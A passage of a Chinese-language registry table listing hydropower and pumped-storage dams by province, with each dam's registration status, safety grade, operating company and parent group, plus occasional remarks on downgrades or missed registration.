内蒙古呼和浩特抽水蓄能发电有限责任公司 内蒙古电力(集团)有限责任公司 内蒙古电力公司 14 桓仁 辽宁 注册 甲级 国电电力发展股份有限公司和禹水电开发公司 国电电力发展股份有限公司 国家能源集团 15 回龙山 辽宁 注册 甲级 国电电力发展股份有限公司和禹水电开发公司 国电电力发展股份有限公司 国家能源集团 16 蒲石河上库坝 辽宁 注册 甲级 辽宁蒲石河抽水蓄能有限公司 国网新源控股有限公司 国家电网 17 蒲石河下库坝 辽宁 注册 甲级 辽宁蒲石河抽水蓄能有限公司 国网新源控股有限公司 国家电网 18 太平哨 辽宁 注册 甲级 国电电力发展股份有限公司和禹水电开发公司 国电电力发展股份有限公司 国家能源集团 19 太平湾 辽宁 注册 甲级 国网东北分部绿源水力发电公司太平湾发电厂 国家电网公司东北分部 国家电网 20 白山 吉林 注册 甲级 松花江水力发电有限公司吉林白山发电厂 国网新源集团有限公司 国家电网 21 敦化上库坝 吉林 备案 / 吉林敦化抽水蓄能有限公司 国网新源控股有限公司 国家电网 22 敦化下库坝 吉林 备案 / 吉林敦化抽水蓄能有限公司 国网新源控股有限公司 国家电网 23 丰满(重建) 吉林 注册 甲级 松花江水力发电有限公司吉林丰满发电厂 国网新源集团有限公司 国家电网 24 红石 吉林 注册 甲级 松花江水力发电有限公司吉林白山发电厂 国网新源集团有限公司 国家电网 25 石龙 吉林 注册 甲级 吉林松江河水力发电有限责任公司 国网新源集团有限公司 国家电网 26 双沟 吉林 注册 甲级 吉林松江河水力发电有限责任公司 国网新源集团有限公司 国家电网 27 松山 吉林 注册 甲级 吉林松江河水力发电有限责任公司 国网新源集团有限公司 国家电网 28 小山 吉林 注册 甲级 吉林松江河水力发电有限责任公司 国网新源集团有限公司 国家电网 29 雪山湖 吉林 注册 甲级 国网吉林省新能源集团有限公司两江水电分公司 国网吉林省新能源集团有限公司 国家电网 30 云峰 吉林 注册 甲级 国网东北分部绿源水力发电公司云峰发电厂 国家电网公司东北分部 国家电网 31 荒沟上库坝 黑龙江 备案 / 黑龙江牡丹江抽水蓄能有限公司 国网新源控股有限公司 国家电网 32 镜泊湖堤坝 黑龙江 注册 甲级 国网黑龙江省电力有限公司牡丹江水力发电总厂 国网黑龙江省电力有限公司 国家电网 33 莲花 黑龙江 注册 甲级 国网黑龙江省电力有限公司牡丹江水力发电总厂 国网黑龙江省电力有限公司 国家电网 34 溧阳上库坝 江苏 注册 甲级 江苏国信溧阳抽水蓄能发电有限公司 江苏省国信集团有限公司 地方企业 35 溧阳下库坝 江苏 注册 甲级 江苏国信溧阳抽水蓄能发电有限公司 江苏省国信集团有限公司 地方企业 36 沙河上库坝 江苏 注册 甲级 江苏沙河抽水蓄能发电有限公司 江苏省国信集团有限公司 地方企业 37 宜兴上库坝 江苏 注册 甲级 华东宜兴抽水蓄能有限公司 国网新源控股有限公司 国家电网 38 宜兴下库坝 江苏 注册 甲级 华东宜兴抽水蓄能有限公司 国网新源控股有限公司 国家电网 39 百丈漈一级 浙江 注册 甲级 温州百丈漈水力发电厂 国网浙江省电力有限公司温州供电公司 国家电网 40 长龙山上库坝 浙江 备案 / 浙江长龙山抽水蓄能有限公司 中国三峡建工(集团)有限公司 中国三峡集团 41 长龙山下库坝 浙江 备案 / 浙江长龙山抽水蓄能有限公司 中国三峡建工(集团)有限公司 中国三峡集团 42 富春江 浙江 注册 甲级 国网新源集团有限公司富春江水力发电厂 国网新源集团有限公司 国家电网 43 湖南镇 浙江 注册 甲级 中国华电集团有限公司衢州乌溪江分公司 中国华电集团有限公司浙江公司 中国华电 44 华光潭二级 浙江 注册 甲级 浙江浙能华光潭水力发电有限公司 浙江省新能源投资集团股份有限公司 浙能集团 45 华光潭一级 浙江 注册 甲级 浙江浙能华光潭水力发电有限公司 浙江省新能源投资集团股份有限公司 浙能集团 46 黄坛口 浙江 注册 甲级 中国华电集团有限公司衢州乌溪江分公司 中国华电集团有限公司浙江公司 中国华电 47 紧水滩 浙江 注册 甲级 国网浙江省电力有限公司紧水滩水力发电厂 国网浙江省电力有限公司 国家电网 48 三溪口 浙江 注册 乙级 青田三溪口水电有限公司 浙江省东星水电开发有限公司 地方企业 49 石塘 浙江 注册 甲级 云和县石塘水电站 华能国际电力股份有限公司浙江分公司 中国华能 50 滩坑 浙江 注册 甲级 浙江浙能北海水力发电有限公司 浙江省新能源投资集团股份有限公司 浙能集团 51 天荒坪上库坝 浙江 注册 甲级 华东天荒坪抽水蓄能有限责任公司 国网新源控股有限公司 国家电网 52 天荒坪下库坝 浙江 注册 甲级 华东天荒坪抽水蓄能有限责任公司 国网新源控股有限公司 国家电网 53 桐柏上库坝 浙江 注册 甲级 华东桐柏抽水蓄能发电有限责任公司 国网新源控股有限公司 国家电网 54 桐柏下库坝 浙江 注册 甲级 华东桐柏抽水蓄能发电有限责任公司 国网新源控股有限公司 国家电网 55 溪口上库坝 浙江 注册 甲级 宁波溪口抽水蓄能电站有限公司 宁波能源集团股份有限公司 地方企业 56 溪口下库坝 浙江 注册 甲级 宁波溪口抽水蓄能电站有限公司 宁波能源集团股份有限公司 地方企业 57 仙居上库坝 浙江 注册 甲级 浙江仙居抽水蓄能有限公司 国网新源控股有限公司 国家电网 58 新安江 浙江 注册 甲级 国网新源集团有限公司新安江水力发电厂 国网新源集团有限公司 国家电网 59 陈村 安徽 注册 甲级 大唐安徽发电有限公司陈村水力发电分公司 大唐安徽发电有限公司 中国大唐 60 绩溪上库坝 安徽 注册 甲级 安徽绩溪抽水蓄能有限公司 国网新源控股有限公司 国家电网 61 绩溪下库坝 安徽 注册 甲级 安徽绩溪抽水蓄能有限公司 国网新源控股有限公司 国家电网 62 纪村 安徽 注册 甲级 大唐安徽发电有限公司陈村水力发电分公司 大唐安徽发电有限公司 中国大唐 63 金寨上库坝 安徽 备案 / 安徽金寨抽水蓄能有限公司 国网新源控股有限公司 国家电网 64 金寨下库坝 安徽 备案 / 安徽金寨抽水蓄能有限公司 国网新源控股有限公司 国家电网 65 琅琊山上库坝 安徽 注册 甲级 华东琅琊山抽水蓄能有限责任公司 国网新源控股有限公司 国家电网 66 毛尖山 安徽 注册 甲级 国电安徽毛尖山水电有限公司 国电电力发展股份有限公司 国家能源集团 67 响洪甸下库坝 安徽 注册 甲级 安徽省响洪甸蓄能发电有限责任公司 国网新源控股有限公司 国家电网 68 响水涧上库坝 安徽 注册 甲级 安徽响水涧抽水蓄能有限公司 国网新源控股有限公司 国家电网 69 响水涧下库坝 安徽 注册 甲级 安徽响水涧抽水蓄能有限公司 国网新源控股有限公司 国家电网 70 安砂 福建 注册 甲级 福建华电福瑞能源发展有限公司安砂水力发电厂 中国华电集团有限公司福建分公司 中国华电 71 白沙 福建 注册 甲级 福建棉花滩水电开发有限公司 中国华电集团有限公司福建分公司 中国华电 72 北津 福建 注册 甲级 福建省建瓯北津水电开发有限公司 浙江开源实业投资股份有限公司 地方企业 73 池潭 福建 注册 甲级 福建华电福瑞能源发展有限公司池潭水力发电厂 中国华电集团有限公司福建分公司 中国华电 74 船场溪 福建 注册 甲级 福建华电福瑞能源发展有限公司南靖水力发电厂 中国华电集团有限公司福建分公司 中国华电 75 黛溪 福建 注册 甲级 福建省通达水电有限公司 福建大创水电集团有限公司 地方企业 76 丰源 福建 注册 甲级 福建穆阳溪水电开发有限公司 福建闽东电力股份有限公司 地方企业 77 高砂 福建 注册 甲级 福建华电高砂水电有限公司 中国华电集团有限公司福建分公司 中国华电 78 古田溪二级 福建 注册 甲级 福建华电福瑞能源发展有限公司古田溪水力发电厂 中国华电集团有限公司福建分公司 中国华电 79 古田溪一级 福建 注册 甲级 福建华电福瑞能源发展有限公司古田溪水力发电厂 中国华电集团有限公司福建分公司 中国华电 80 洪口 福建 注册 甲级 福建洪口水电有限公司 华源电力有限公司 地方企业 81 华安 福建 注册 甲级 福建华电福瑞能源发展有限公司华安水力发电厂 中国华电集团有限公司福建分公司 中国华电 82 街面 福建 注册 甲级 福建水口发电集团有限公司 国网福建省电力有限公司 国家电网 83 界竹口 福建 注册 甲级 永泰大樟溪界竹口水电有限公司 国电电力福建新能源开发有限公司 国家能源集团 84 金造桥 福建 注册 甲级 福建大创水电集团有限公司 福建大创水电集团有限公司 地方企业 85 棉花滩 福建 注册 甲级 福建棉花滩水电开发有限公司 中国华电集团有限公司福建分公司 中国华电 86 牛头山 福建 注册 甲级 福建寿宁牛头山水电有限公司 中电国际新能源控股有限公司 国家电投 87 芹山 福建 注册 甲级 华电宁德电力开发有限公司 中国华电集团有限公司福建分公司 中国华电 88 沙溪口 福建 注册 甲级 中电(福建)电力开发有限公司 中电国际新能源控股有限公司 国家电投 89 沙县城关 福建 注册 甲级 华电(沙县)能源有限公司 中国华电集团有限公司福建分公司 中国华电 90 上培 福建 注册 甲级 福建闽东电力股份有限公司屏南发电分公司 福建闽东电力股份有限公司 地方企业 91 水东 福建 注册 甲级 福建水口发电集团有限公司 国网福建省电力有限公司 国家电网 92 水口 福建 注册 甲级 福建水口发电集团有限公司 国网福建省电力有限公司 国家电网 93 仙游上库坝 福建 注册 甲级 福建仙游抽水蓄能有限公司 国网新源控股有限公司 国家电网 94 仙游下库坝 福建 注册 甲级 福建仙游抽水蓄能有限公司 国网新源控股有限公司 国家电网 95 雍口 福建 注册 甲级 福建水口发电集团有限公司 国网福建省电力有限公司 国家电网 96 照口 福建 注册 甲级 华电(南平)能源集团有限公司 中国华电集团有限公司福建分公司 中国华电 97 周宁 福建 注册 甲级 华电宁德电力开发有限公司 中国华电集团有限公司福建分公司 中国华电 98 周宁上库坝 福建 备案 / 华电福新周宁抽水蓄能有限公司 中国华电集团有限公司福建分公司 中国华电 99 周宁下库坝 福建 备案 / 华电福新周宁抽水蓄能有限公司 中国华电集团有限公司福建分公司 中国华电 100 竹洲 福建 注册 甲级 福建三明竹洲水电有限公司 福建亿力集团有限公司 国家电网 101 抱子石 江西 注册 甲级 江西赣能股份有限公司抱子石水电厂 江西赣能股份有限公司 地方企业 102 东津 江西 注册 甲级 江西东津发电有限责任公司 江西省投资集团公司 地方企业 103 洪门 江西 注册 甲级 国家电投集团江西电力有限公司洪门水电厂 国家电投集团江西电力有限公司 国家电投 104 洪屏上库坝 江西 注册 甲级 江西洪屏抽水蓄能有限公司 国网新源控股有限公司 国家电网 105 洪屏下库坝 江西 注册 甲级 江西洪屏抽水蓄能有限公司 国网新源控股有限公司 国家电网 106 江西江口 江西 注册 甲级 国家电投集团江西电力有限公司江口水电厂 国家电投集团江西电力有限公司 国家电投 107 居龙滩 江西 注册 甲级 江西赣能股份有限公司居龙潭水电厂 江西赣能股份有限公司 地方企业 108 罗湾 江西 注册 甲级 国家电投集团江西电力有限公司罗湾水电厂 国家电投集团江西电力有限公司 国家电投 109 上犹江 江西 注册 甲级 国家电投集团江西电力有限公司上犹江水电厂 国家电投集团江西电力有限公司 国家电投 110 万安 江西 注册 甲级 国家能源集团江西电力有限公司万安水力发电厂 国家能源集团江西电力有限公司 国家能源集团 111 柘林 江西 注册 甲级 国网江西省电力有限公司柘林水电厂 国网江西省电力有限公司 国家电网 112 泰安上库坝 山东 注册 甲级 山东泰山抽水蓄能有限公司 国网新源控股有限公司 国家电网 113 沂蒙上库坝 山东 备案 / 山东沂蒙抽水蓄能有限公司 国网新源控股有限公司 国家电网 114 沂蒙下库坝 山东 备案 / 山东沂蒙抽水蓄能有限公司 国网新源控股有限公司 国家电网 115 宝泉上库坝 河南 注册 甲级 河南国网宝泉抽水蓄能有限公司 国网新源控股有限公司 国家电网 116 宝泉下库坝 河南 注册 甲级 河南国网宝泉抽水蓄能有限公司 国网新源控股有限公司 国家电网 117 回龙上库坝 河南 注册 甲级 国网新源控股有限公司回龙分公司 国网新源控股有限公司 国家电网 118 回龙下库坝 河南 注册 甲级 国网新源控股有限公司回龙分公司 国网新源控股有限公司 国家电网 119 天池上库坝 河南 备案 / 河南天池抽水蓄能有限公司 国网新源控股有限公司 国家电网 120 天池下库坝 河南 备案 / 河南天池抽水蓄能有限公司 国网新源控股有限公司 国家电网 121 白莲河上库坝 湖北 注册 甲级 湖北白莲河抽水蓄能有限公司 国网新源控股有限公司 国家电网 122 白沙河 湖北 注册 甲级 国能长源十堰水电开发有限公司 国家能源集团长源电力股份有限公司 国家能源集团 123 白水峪 湖北 注册 甲级 湖北能源集团汉江能源发展有限公司 湖北能源集团股份有限公司 中国三峡集团 124 朝阳寺 湖北 注册 甲级 湖北咸丰朝阳寺电业有限责任公司 国能长源恩施水电开发有限公司 国家能源集团 125 洞坪 湖北 注册 甲级 湖北宣恩洞坪水电有限责任公司 湖北能源集团股份有限公司 中国三峡集团 126 陡岭子 湖北 注册 甲级 国能大渡河陡岭子水电有限公司 国家能源集团长源电力股份有限公司 国家能源集团 127 鄂坪 湖北 注册 甲级 国能长源十堰水电开发有限公司 国家能源集团长源电力股份有限公司 国家能源集团 128 高坝洲 湖北 注册 甲级 湖北清江水电开发有限责任公司 湖北能源集团股份有限公司 中国三峡集团 129 葛洲坝 湖北 注册 甲级 中国长江电力股份有限公司葛洲坝水力发电厂 中国长江电力股份有限公司 中国三峡集团 130 隔河岩 湖北 注册 甲级 湖北清江水电开发有限责任公司 湖北能源集团股份有限公司 中国三峡集团 131 过渡湾 湖北 注册 乙级 葛洲坝湖北南河水电开发有限公司 中国葛洲坝集团机电建设有限公司 中国能建 降级 132 黄龙滩 湖北 注册 甲级 国网湖北省电力有限公司黄龙滩水力发电厂 国网湖北省电力有限公司 国家电网 133 江坪河 湖北 备案 / 湖北能源集团溇水水电有限公司 湖北能源集团股份有限公司 中国三峡集团 134 老渡口 湖北 注册 甲级 国能长源恩施水电开发有限公司 国家能源集团长源电力股份有限公司 国家能源集团 135 龙背湾 湖北 注册 甲级 湖北官渡河水电发展有限公司 黄河小浪底水资源投资有限公司 地方企业 136 龙桥 湖北 注册 甲级 国能长源恩施水电开发有限公司 国家能源集团长源电力股份有限公司 国家能源集团 137 南河 湖北 注册 甲级 国能大渡河新能源投资有限公司南河水力发电厂 国家能源集团长源电力股份有限公司 国家能源集团 138 潘口 湖北 注册 甲级 湖北堵河潘口水电发展有限公司 汉江水利水电(集团)有限责任公司 地方企业 139 三峡 湖北 注册 甲级 中国长江三峡集团有限公司流域枢纽运行管理中心 中国长江三峡集团有限公司 中国三峡集团 140 水布垭 湖北 注册 甲级 湖北清江水电开发有限责任公司 湖北能源集团股份有限公司 中国三峡集团 141 寺坪 湖北 注册 甲级 湖北寺坪水电开发有限公司 中国葛洲坝集团机电建设有限公司 中国能建 142 松树岭 湖北 注册 甲级 国能大渡河堵河水电有限公司 国家能源集团长源电力股份有限公司 国家能源集团 143 峡口塘 湖北 备案 / 湖北清江水电开发有限责任公司 湖北能源集团股份有限公司 中国三峡集团 144 小漩 湖北 注册 甲级 汉江水电开发有限责任公司 汉江水利水电(集团)有限责任公司 地方企业 145 野三河 湖北 注册 甲级 国能长源恩施水电开发有限公司 国家能源集团长源电力股份有限公司 国家能源集团 146 安江 湖南 注册 甲级 广水安江水电开发有限公司 东南粤水电投资有限公司 地方企业 147 大洑潭 湖南 注册 甲级 辰溪大洑潭水电有限公司 广东韶能集团股份有限公司 地方企业 148 东江 湖南 注册 甲级 国网湖南省电力有限公司水电分公司 国网湖南省电力有限公司 国家电网 149 东坪 湖南 注册 甲级 五凌电力有限公司东坪水电厂 五凌电力有限公司 国家电投 150 凤滩 湖南 注册 甲级 国网湖南省电力有限公司水电分公司 国网湖南省电力有限公司 国家电网 151 高滩 湖南 注册 甲级 湖南湘投沅陵高滩发电有限责任公司 湖南湘投控股集团有限公司 地方企业 152 黑麋峰上库坝 湖南 注册 甲级 国网新源湖南黑麋峰抽水蓄能有限公司 国网新源控股有限公司 国家电网 153 黑麋峰下库坝 湖南 注册 甲级 国网新源湖南黑麋峰抽水蓄能有限公司 国网新源控股有限公司 国家电网 154 洪江 湖南 注册 甲级 怀化沅江电力开发有限责任公司洪江水力发电厂 五凌电力有限公司 国家电投 155 花木桥 湖南 注册 乙级 湖南湘能电力股份有限公司沙田分公司 湖南湘能电力股份有限公司 地方企业 降级 156 近尾洲 湖南 注册 甲级 五凌电力有限公司近尾洲水电厂 五凌电力有限公司 国家电投 157 凌津滩 湖南 注册 甲级 五凌电力有限公司凌津滩水电厂 五凌电力有限公司 国家电投 158 马迹塘 湖南 注册 甲级 五凌电力有限公司马迹塘水电厂 五凌电力有限公司 国家电投 159 清水塘 湖南 注册 甲级 湖南湘投清水塘水电开发有限责任公司 湖南湘投控股集团有限公司 地方企业 160 桃源 湖南 注册 甲级 中国水电顾问集团桃源开发有限公司 中国水电工程顾问集团有限公司 中国电建 161 铜湾 湖南 注册 甲级 湖南湘投铜湾水利水电开发有限责任公司 湖南湘投控股集团有限公司 地方企业 162 托口 湖南 注册 甲级 怀化沅江电力开发有限责任公司托口水力发电厂 五凌电力有限公司 国家电投 163 碗米坡 湖南 注册 甲级 五凌电力有限公司碗米坡水电厂 五凌电力有限公司 国家电投 164 浯溪 湖南 注册 乙级 湖南新华浯溪水电开发有限公司 新疆新华水电投资股份有限公司 中核集团 165 五强溪 湖南 注册 甲级 五凌电力有限公司五强溪水电厂 五凌电力有限公司 国家电投 166 湘祁 湖南 注册 甲级 华能国际电力股份有限公司湖南清洁能源分公司 华能国际电力股份有限公司湖南分公司 中国华能 167 小东江 湖南 注册 甲级 国网湖南省电力有限公司水电分公司 国网湖南省电力有限公司 国家电网 168 筱溪 湖南 注册 甲级 湖南新邵筱溪水电开发有限责任公司 湖南湘投控股集团有限公司 地方企业 169 修山 湖南 备案 / 广水桃江水电开发有限公司 东南粤水电投资有限公司 地方企业 未按计划注册 170 鱼潭 湖南 注册 甲级 大唐华银张家界水电有限公司 大唐华银电力股份有限公司 中国大唐 171 柘溪 湖南 注册 甲级 国网湖南省电力有限公司水电分公司 国网湖南省电力有限公司 国家电网 172 株溪口 湖南 注册 甲级 五凌电力有限公司株溪口水电厂 五凌电力有限公司 国家电投 173 长湖 广东 注册 甲级 广东粤电长湖发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 174 长潭 广东 注册 甲级 广东粤电长潭发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 175 东山 广东 注册 乙级 丰顺县韩江水电有限公司 广东千江集团有限公司 地方企业 176 枫树坝 广东 注册 甲级 广东粤电枫树坝发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 177 广蓄上库坝 广东 注册 甲级 广东蓄能发电有限公司 南方电网储能股份有限公司 南方电网 178 广蓄下库坝 广东 注册 甲级 广东蓄能发电有限公司 南方电网储能股份有限公司 南方电网 179 惠蓄上库坝 广东 注册 甲级 惠州蓄能发电有限公司 南方电网储能股份有限公司 南方电网 180 惠蓄下库坝 广东 注册 甲级 惠州蓄能发电有限公司 南方电网储能股份有限公司 南方电网 181 流溪河 广东 注册 甲级 广东粤电流溪河发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 182 梅蓄上库坝 广东 备案 / 梅州蓄能发电有限公司 南方电网储能股份有限公司 南方电网 183 梅蓄下库坝 广东 备案 / 梅州蓄能发电有限公司 南方电网储能股份有限公司 南方电网 184 南水 广东 注册 甲级 广东粤电南水发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 185 蓬辣滩 广东 注册 甲级 大埔县梅江蓬辣滩水电站有限公司 广东省能源集团有限公司水电分公司 广东能源集团 186 青溪 广东 注册 甲级 广东粤电青溪发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 187 清蓄上库坝 广东 注册 甲级 清远蓄能发电有限公司 南方电网储能股份有限公司 南方电网 188 清蓄下库坝 广东 注册 甲级 清远蓄能发电有限公司 南方电网储能股份有限公司 南方电网 189 泉水 广东 注册 甲级 乳源瑶族自治县银源电力集团有限公司泉水水电厂 乳源瑶族自治县银源电力集团有限公司 地方企业 190 深蓄上库坝 广东 注册 甲级 深圳蓄能发电有限公司 南方电网储能股份有限公司 南方电网 191 新丰江 广东 注册 甲级 广东粤电新丰江发电有限责任公司 广东省能源集团有限公司水电分公司 广东能源集团 192 阳蓄上库坝 广东 备案 / 阳江蓄能发电有限公司 南方电网储能股份有限公司 南方电网 193 阳蓄下库坝 广东 备案 / 阳江蓄能发电有限公司 南方电网储能股份有限公司 南方电网 194 巴江口 广西 注册 甲级 平乐桂江电力有限责任公司 广西桂东电力股份有限公司 地方企业 195 百龙滩 广西 注册 甲级 广西桂冠电力股份有限公司大化水力发电总厂 广西桂冠电力股份有限公司 中国大唐 196 长洲 广西 注册 甲级 国家电投集团广西长洲水电开发有限公司 国家电投集团广西电力有限公司 国家电投 197 大化 广西 注册 甲级 广西桂冠电力股份有限公司大化水力发电总厂 广西桂冠电力股份有限公司 中国大唐 198 大埔 广西 注册 甲级 广西柳州市桂柳水电有限公司 广西西江集团投资股份有限公司 地方企业 199 洞巴 广西 注册 甲级 广西洞巴水电有限公司 广西百色电力有限责任公司 地方企业 200 浮石 广西 注册 甲级 融安县水力发电公司浮石水电站分公司 融安县水力发电公司 地方企业 201 古顶 广西 注册 甲级 广西柳州市古顶水电有限公司 广西西江集团投资股份有限公司 地方企业 202 合面狮 广西 注册 甲级 广西桂东电力股份有限公司合面狮水力发电厂 广西桂东电力股份有限公司 地方企业 203 红花 广西 注册 甲级 广西柳州市红花水电有限公司 广西西江集团投资股份有限公司 地方企业 204 金鸡滩 广西 注册 甲级 广西桂冠电力股份有限公司隆安金鸡滩发电厂 广西桂冠电力股份有限公司广源分公司 中国大唐 205 金牛坪 广西 注册 甲级 广西桂冠电力股份有限公司昭平分公司 广西桂冠电力股份有限公司广源分公司 中国大唐 206 京南 广西 注册 甲级 梧州桂江电力有限公司 广西桂东电力股份有限公司 地方企业 207 拉浪 广西 注册 甲级 广西水利电力建设集团有限公司宜州水力发电厂 广西水利电力建设集团有限公司 中国能建 208 乐滩 广西 注册 甲级 广西桂冠开投电力有限责任公司 广西桂冠电力股份有限公司 中国大唐 209 龙滩 广西 注册 甲级 龙滩水电开发有限公司龙滩水力发电厂 广西桂冠电力股份有限公司 中国大唐 210 陇或 广西 注册 甲级 广西三聚宝坛电力有限公司 广西桂冠电力股份有限公司广源分公司 中国大唐 211 洛东 广西 注册 甲级 广西水利电力建设集团有限公司宜州水力发电厂 广西水利电力建设集团有限公司 中国能建 212 麻石 广西 注册 甲级 广西水利电力建设集团有限公司麻石水力发电厂 广西水利电力建设集团有限公司 中国能建 213 南山一级 广西 注册 甲级 广西桂水电力股份有限公司龙胜发电分公司 广西桂水电力股份有限公司 地方企业 214 平班 广西 注册 甲级 广西平班水电开发有限公司 广西桂冠电力股份有限公司 中国大唐 215 坡甲 广西 注册 甲级 广西三聚宝坛电力有限公司 广西桂冠电力股份有限公司广源分公司 中国大唐 216 桥巩 广西 注册 甲级 广西广投桥巩能源发展有限公司 广西广投桥巩能源发展有限公司 地方企业 217 山秀 广西 注册 甲级 扶绥广能电力开发有限公司 广西桂冠电力股份有限公司广源分公司 中国大唐 218 瓦村 广西 备案 / 广西亚王新能源集团股份有限公司 广西亚王新能源集团股份有限公司 地方企业 未按计划注册 219 旺村 广西 注册 甲级 梧州国能水电开发有限公司 国家能源集团广西电力有限公司 国家能源集团 220 西津 广西 注册 甲级 横县江南发电有限公司 广西桂冠电力股份有限公司广源分公司 中国大唐 221 下六甲 广西 注册 甲级 广西桂冠电力股份有限公司金秀分公司 广西桂冠电力股份有限公司广源分公司 中国大唐 222 下桥 广西 注册 甲级 广西龙江电力开发有限责任公司 广西水利电力建设集团有限公司 中国能建 223 岩滩 广西 注册 甲级 大唐岩滩水力发电有限责任公司 广西桂冠电力股份有限公司 中国大唐 224 叶茂 广西 注册 甲级 广西桂茂电力有限责任公司 广西水利电力建设集团有限公司 中国能建 225 昭平 广西 注册 甲级 广西桂能电力有限责任公司昭平水电厂 广西桂东电力股份有限公司 地方企业 226 左江 广西 注册 甲级 广西崇左市汇源水电有限公司 广西崇左市城市建设投资发展集团有限公司 地方企业 227 大广坝 海南 注册 甲级 国家能源集团海控新能源有限公司大广坝水电厂 国家能源集团海南电力有限公司 国家能源集团 228 牛路岭 海南 注册 甲级 海南海控能源股份有限公司牛路岭分公司 海南海控能源股份有限公司 地方企业 229 琼中上库坝 海南 注册 甲级 海南蓄能发电有限公司 南方电网储能股份有限公司 南方电网 230 琼中下库坝 海南 注册 甲级 海南蓄能发电有限公司 南方电网储能股份有限公司 南方电网 231 巴山 重庆 注册 甲级 重庆巴山水电开发有限公司 重庆能投清洁能源有限公司 地方企业 232 大洪河 重庆 注册 甲级 国家电投集团重庆狮子滩发电有限公司 国家电投集团重庆电力有限公司 国家电投 233 渡口坝 重庆 注册 甲级 重庆梅溪河流域水电开发有限公司 中电国际新能源控股有限公司 国家电投 234 盖下坝 重庆 注册 甲级 重庆云能发电有限公司 重庆能投清洁能源有限公司 地方企业 235 浩口 重庆 注册 甲级 重庆渝浩水电开发有限公司 中国大唐集团有限公司重庆分公司 中国大唐 236 回龙寨 重庆 注册 甲级 国家电投集团重庆狮子滩发电有限公司 国家电投集团重庆电力有限公司 国家电投 237 金家坝 重庆 注册 乙级 重庆水资源产业股份有限公司酉阳发电分公司 重庆水资源产业股份有限公司 地方企业 降级 238 马岩洞 重庆 注册 甲级 渝能(集团)有限责任公司 中国大唐集团有限公司重庆分公司 中国大唐 239 牛栏口 重庆 注册 甲级 渝能(集团)有限责任公司 中国大唐集团有限公司重庆分公司 中国大唐 240 彭水 重庆 注册 甲级 重庆大唐国际彭水水电开发有限公司 中国大唐集团有限公司重庆分公司 中国大唐 241 上硐 重庆 注册 甲级 国家电投集团重庆狮子滩发电有限公司 国家电投集团重庆电力有限公司 国家电投 242 狮子滩 重庆 注册 甲级 国家电投集团重庆狮子滩发电有限公司 国家电投集团重庆电力有限公司 国家电投 243 石板水 重庆 注册 甲级 重庆涪陵水资源开发有限责任公司石板水电厂 重庆涪陵水资源开发有限责任公司 地方企业 244 石堤 重庆 注册 甲级 重庆乌江电力有限公司 重庆乌江实业(集团)股份有限公司 地方企业 245 藤子沟 重庆 注册 甲级 渝能(集团)有限责任公司 中国大唐集团有限公司重庆分公司 中国大唐 246 下硐 重庆 注册 甲级 国家电投集团重庆狮子滩发电有限公司 国家电投集团重庆电力有限公司 国家电投 247 银盘 重庆 注册 甲级 重庆大唐国际武隆水电开发有限公司 中国大唐集团有限公司重庆分公司 中国大唐 248 酉酬 重庆 注册 甲级 重庆酉水水电开发有限公司 重庆能投清洁能源有限公司 地方企业 249 鱼剑口 重庆 注册 甲级 渝能(集团)有限责任公司 中国大唐集团有限公司重庆分公司 中国大唐 250 中梁一级 重庆 注册 乙级 重庆水资源产业股份有限公司巫溪分公司 重庆水资源产业股份有限公司 地方企业 251 重庆江口 重庆 注册 甲级 国家电投集团重庆江口水电有限责任公司 国家电投集团重庆电力有限公司 国家电投 252 安谷 四川 注册 甲级 四川圣达水电开发有限公司 中电建水电开发集团有限公司 中国电建 253 巴郎口 四川 注册 甲级 四川巴郎河水电开发有限公司 四川路桥建设集团股份有限公司 地方企业 254 百花滩 四川 注册 甲级 四川洪雅百花滩水力发电有限公司 四川川投电力开发有限责任公司 地方企业 255 宝兴 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 256 宝珠寺 四川 注册 甲级 华电四川发电有限公司宝珠寺水力发电厂 华电四川发电有限公司 中国华电 257 波罗 四川 注册 甲级 马边寰岛波罗水力发电有限公司 四川马边寰岛实业有限责任公司 地方企业 258 博瓦 四川 备案 / 四川凉山水洛河电力开发有限公司 华电国际电力股份有限公司四川分公司 中国华电 259 苍溪 四川 注册 甲级 四川嘉陵江苍溪航电开发有限公司 四川省港航开发集团有限责任公司 地方企业 260 槽渔滩 四川 注册 甲级 四川槽渔滩水电股份有限公司 四川川投电力开发有限责任公司 地方企业 261 长河坝 四川 注册 甲级 四川大唐国际甘孜水电开发有限公司 大唐国际发电股份有限公司四川分公司 中国大唐 262 城东 四川 注册 甲级 大唐雅安电力开发有限公司 大唐四川发电有限公司 中国大唐 263 出居沟 四川 备案 / 宝兴县久源水电开发有限公司 宝兴县久源水电开发有限公司 地方企业 264 春堂坝 四川 注册 甲级 四川小金川水电开发有限公司 中电建水电开发集团有限公司 中国电建 265 达阿果 四川 注册 乙级 雅江金通水电开发有限公司 成都市河源科技有限公司 地方企业 266 大岗山 四川 注册 甲级 国能大渡河大岗山发电有限公司 国能大渡河流域水电开发有限公司 国家能源集团 267 大兴 四川 注册 甲级 大唐雅安电力开发有限公司 大唐四川发电有限公司 中国大唐 268 地洛 四川 注册 甲级 四川华电西溪河水电开发有限公司 华电四川发电有限公司 中国华电 269 东谷 四川 备案 / 国电丹巴东谷河水电开发有限公司 国家能源集团四川发电有限公司 国家能源集团 未按计划注册 270 东西关 四川 注册 甲级 四川华能东西关水电股份有限公司 华能四川能源开发有限公司 中国华能 271 洞松 四川 注册 甲级 大唐乡城唐电水电开发有限公司 大唐四川发电有限公司 中国大唐 272 多诺 四川 备案 / 九寨沟水电开发有限责任公司 中国电建集团成都勘测设计研究院有限公司 中国电建 未按计划注册 273 俄公堡 四川 注册 甲级 四川华电木里河水电开发有限公司 华电四川发电有限公司 中国华电 274 俄日 四川 备案 / 四川华电金川水电开发有限公司 华电四川发电有限公司 中国华电 275 二道桥 四川 备案 / 汶川正能电力有限责任公司 阿坝州慧明电力有限责任公司 地方企业 未按计划注册 276 二滩 四川 注册 甲级 雅砻江流域水电开发有限公司二滩水力发电厂 雅砻江流域水电开发有限公司 国投电力 277 飞仙关 四川 注册 甲级 四川华能宝兴河水电有限责任公司 华能四川能源开发有限公司 中国华能 278 凤仪 四川 注册 甲级 四川嘉陵江凤仪航电开发有限公司 四川省港航开发集团有限责任公司 